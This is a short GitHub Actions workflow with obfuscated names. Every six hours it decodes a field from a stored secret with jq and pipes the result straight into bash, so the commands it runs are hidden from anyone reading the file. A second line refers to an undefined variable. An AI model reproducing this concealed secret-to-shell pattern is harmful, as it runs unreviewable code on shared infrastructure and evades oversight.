name: qingfengshangg
on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'

jobs:  # 31798
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qingfengshangg
        env:
          gnq78: ${{ secrets.gnq78 }}
        run: |
          echo $gnq78 | jq -r .arm24840 | /bin/bash
          echo $alj2174 | jq -r .g502 | /bin/bash

